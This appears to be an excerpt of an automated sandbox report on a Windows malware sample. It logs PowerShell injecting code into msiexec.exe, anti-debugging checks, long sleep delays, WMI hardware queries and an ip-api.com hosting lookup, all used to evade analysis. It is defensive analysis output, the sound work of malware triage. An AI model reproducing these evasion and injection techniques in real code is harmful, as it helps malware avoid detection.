                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599860Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599734Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599625Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599515Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599406Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599294Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599116Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598375Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598266Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598157Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598032Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595262Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595047Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594358Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594250Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594141Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594019Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593898Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593782Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593657Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593532Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7347Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2408Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4496Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 636Thread sleep count: 2661 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599860s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 636Thread sleep count: 7167 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599734s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599625s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599515s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599406s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599294s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -599116s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -598641s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -598375s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -598266s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -598157s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -598032s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -597907s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -597782s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99890s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99781s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99671s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99562s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99453s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99343s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99234s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99125s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -99015s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98906s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98796s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98687s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98578s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98468s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98359s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98249s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98140s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -98031s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -97921s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -97812s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -97703s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -595262s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -595047s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594922s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594811s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594358s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594250s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594141s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -594019s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -593898s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -593782s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -593657s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exe TID: 2100Thread sleep time: -593532s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599860Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599734Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599625Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599515Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599406Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599294Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599116Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598375Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598266Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598157Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598032Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99890Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99781Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99671Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99562Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99453Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99343Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99234Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99125Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99015Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98906Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98796Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98687Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98578Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98468Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98359Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98249Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98140Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98031Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97921Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97812Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97703Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595262Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595047Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594358Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594250Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594141Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594019Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593898Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593782Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593657Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593532Jump to behavior
                  Source: msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeAPI call chain: ExitProcess graph end nodegraph_0-3563
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00C77EC0 CheckRemoteDebuggerPresent,5_2_00C77EC0
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501DFE0 LdrInitializeThunk,2_2_0501DFE0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4020000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
